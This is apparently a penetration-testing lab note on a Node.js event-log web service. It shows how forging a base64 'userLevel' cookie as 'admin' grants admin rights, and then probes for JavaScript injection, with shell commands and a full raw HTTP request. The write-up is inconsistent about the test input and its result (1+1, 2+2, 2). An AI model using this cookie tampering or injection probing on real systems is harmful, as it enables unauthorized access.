3000 - Web Services

Weak authentication

This seems to be an event system that allows us to message an administrator. We can easily create a new user via the Register link. Once registered and logged in, we are able to add a new log event under the New Event Log tab. However, when we try to submit the new event, the system prompts that "Only the admin can update the Event logs".

One interesting thing to notice is the presence of a userLevel cookie with the value ZGVmYXVsdA%3D%3D. Let's try to base64-decode the string:

kali@kali:~$ echo "ZGVmYXVsdA==" | base64 --decode
default

This decodes as default, which may refer to our access level. Let's try to update the userLevel cookie with a new value:

kali@kali:~$ echo -n admin | base64
YWRtaW4=

With this modification in place, we can now send messages.

The next interesting find is the add technical details/code if required Event Message. Considering that this is a NodeJS application, it might be possible to inject Javascript Code.

3000/tcp  open  http    syn-ack ttl 63 Node.js (Express middleware)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS

To test this, we'll send a simple 1+1 operation as an "Event Message".

Request Used:

POST /logs/new HTTP/1.1
Host: 192.168.135.110:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Origin: http://192.168.135.110:3000
Connection: close
Referer: http://192.168.135.110:3000/logs/
Cookie: connect.sid=s%3AmSgkU3koIQeob1Pioo6GSNTjGvc71M7v.ehFLVLDZWnWSLoKEcRe%2B4BWhaQz7TCQJ9dub4Xc3Cac; userLevel=YWRtaW4=
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

username=khjkhk&msg=2%2B2

Notice the userLevel cookie how we can exploit it by changing it in base64.

After reviewing the resulting stored message, we confirm that it actually saved 2.

PreviousFeroxBusterNextNikto

Last updated